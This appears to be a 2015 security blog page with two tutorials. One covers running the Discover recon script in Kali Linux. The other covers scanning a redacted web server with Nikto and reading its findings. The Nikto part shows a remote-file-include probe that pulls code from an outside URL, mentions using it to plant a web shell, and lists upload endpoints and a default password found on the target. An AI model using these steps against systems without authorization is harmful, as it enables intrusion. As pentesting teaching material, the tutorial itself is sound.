Thursday 16 July 2015

How to do passive information gathering / discovery in Kali Linux using discover or backtrack script framework 

Passive discovery is an activity of looking and searching information about certain organization or a network.While Kali Linux has massive tools that we can utilize to do this, it might take us a lot of time in learning each tools.
  To solve this problem, we can use discover scripts or previously known as backtrack scripts in our Kali Linux system.The  framework was written by Lee Baird .Discover script not only incorporate various kali tools but it is also easy to use .
   In this tutorial I'll share on how to setup the framework with  Kali Linux  and then I will share on how you can use this framework top ook for a network or any network or company passive information.
1)Installing Discover script
 1.1) Clone git to Kali Linux.  

root@kali:~#cd /opt                                                                                  root@kali:~:/opt$ sudo git clone https://github.com/leebaird/discover.git   

1.2)Setup and install the necessary file for your system .

root@kali:~# cd /opt/discover                                                                             

root@kali:~/opt/discover$ sudo  ./setup.sh                                                           

 

 

 2 ) Using the framework for passive discovery

2.1) Go to  discover folder and execute the "discover.sh" file .

root@kali:~# cd /opt/discover                                                                             

root@kali:~:/opt/discover$ sudo  ./discover.sh                                                           

 

 

2.2)The framework will load and you will be given a list of  task that can be executed .Use the number in the left for the selection.

Discover framework

2.3)In this example, I will run a script and get information base on domain , I choose "1" .


 





 2.4)Then Choose "2" and key in the domain name. in this example, i look for information for "www.google.com" .The framework will then run and execute the required tools for this task.






 



key in the domain url

 

.5) Grab a cup of coffee and enjoy it while the scripts doing it's job. :-)

the system is working hard!



2.5) Upon completing,  the result and report will be prepared and you can view it using internet browser.


2.6) To access this file, from the terminal, go  to "/root/data/(domain name)/"


root@kali:~# cd /opt/discover                                                                             

root@kali:~:/opt/discover$ firefox /root/data/www.google.com                            


 

on No comments:

Pentesting Web Servers with Nikto in Backtrack and Kali Linux

19
June
Nikto is one of the most popular web security application when you are beginning a web pentesting project.

You can download Nikto from http://cirt.net/nikto2 This tool has been included in Backtrack and Kali Linux distributions.

Nikto is an Open Source web server scanner. This tool performs test against web servers making requests for multiple items. Nikto checks:

  • Over 6500 dangerous files/CGIs.
  • More than 1250 outdated version for several web servers.
  • Specific problems on over 270 servers.
  • Presence of index files.
  • HTTP server options like TRACE.
  • Installed software and web servers.


Nikto creates a lot of requests quickly, is not designed as an overly stealthy tool. If you run Nikto against a remote Web Server, the administrator could read a lot of lines on web server log which show the attack. Some SIEMs have defaults rules for correlating these logs and it could create an alarm warning to the administrators about the attack.

These are the Nikto options.
jnieto@naltor:~$ nikto 
Option host requires an argument

       -config+            Use this config file
       -Cgidirs+           scan these CGI dirs: 'none', 'all', or values like "/cgi/ /cgi-a/"
       -dbcheck            check database and other key files for syntax errors
       -Display+           Turn on/off display outputs
       -evasion+           ids evasion technique
       -Format+            save file (-o) format
       -host+              target host
       -Help               Extended help information
       -id+                Host authentication to use, format is id:pass or id:pass:realm
       -list-plugins       List all available plugins
       -mutate+            Guess additional file names
       -mutate-options+    Provide extra information for mutations
       -output+            Write output to this file
       -nocache            Disables the URI cache
       -nossl              Disables using SSL
       -no404              Disables 404 checks
       -port+              Port to use (default 80)
       -Plugins+           List of plugins to run (default: ALL)
       -root+              Prepend root value to all requests, format is /directory 
       -ssl                Force ssl mode on port
       -Single             Single request mode
       -timeout+           Timeout (default 2 seconds)
       -Tuning+            Scan tuning
       -update             Update databases and plugins from CIRT.net
       -vhost+             Virtual host (for Host header)
       -Version            Print plugin and database versions
     + requires a value

 Note: This is the short help output. Use -H for full help.

We are going to run Nikto against a server.

jnieto@naltor:~$ nikto -h www.XxXxXxXxXx.es
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          XXX.XXX.XXX.XXX
+ Target Hostname:    www.XxXxXxXxXx.es
+ Target Port:        80
+ Start Time:         2013-06-19 16:23:35
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Win32) PHP/5.3.1
+ Retrieved x-powered-by header: PHP/5.3.1
+ robots.txt contains 10 entries which should be manually viewed.
+ ETag header found on server, inode: 1688849860445366, size: 1028, mtime: 0x49b5cedbf3834
+ Multiple index files found: index.php, index.html, 
+ PHP/5.3.1 appears to be outdated (current is at least 5.3.5)
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Default account found for 'Acceso restringido a usuarios autorizados' at /webalizer/ (ID '', PW '_Cisco'). Cisco device.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /datos/: This might be interesting...
+ OSVDB-3092: /ftp/: This might be interesting...
+ OSVDB-3092: /imagenes/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /temp/: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_image.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/test.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_flash.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/dialog/fck_link.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3092: /INSTALL.txt: Default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/frmupload.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ OSVDB-3093: /FCKeditor/fckconfig.js: FCKeditor JavaScript file found.
+ OSVDB-3093: /FCKeditor/editor/filemanager/browser/default/browser.html: FCKeditor could allow files to be updated or edited by remote attackers.
+ 6448 items checked: 10 error(s) and 31 item(s) reported on remote host
+ End Time:           2013-06-19 16:27:19 (224 seconds)
---------------------------------------------------------------------------

As you can see, we have find out the Server and PHP versions and a lot of interesting folders.

We have discover a RFI (Remote File Include) on this server... 
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

This URL path get a PHP code from http://cirt.net/rfiinc.txt? with the next code:
<?php phpinfo(); ?>

This code executes "phpinfo" but if you want, you can upload a web shell in order to gain access to the server.




Next line is interesting too. Nikto has located some URLs where you  could upload files with your own source code.

+ OSVDB-3093: /FCKeditor/editor/filemanager/upload/test.html: FCKeditor could allow files to be updated or edited by remote attackers.



Nikto is one of the first applications that I run when a client request me a web audit.
on No comments:
Subscribe to: Posts (Atom)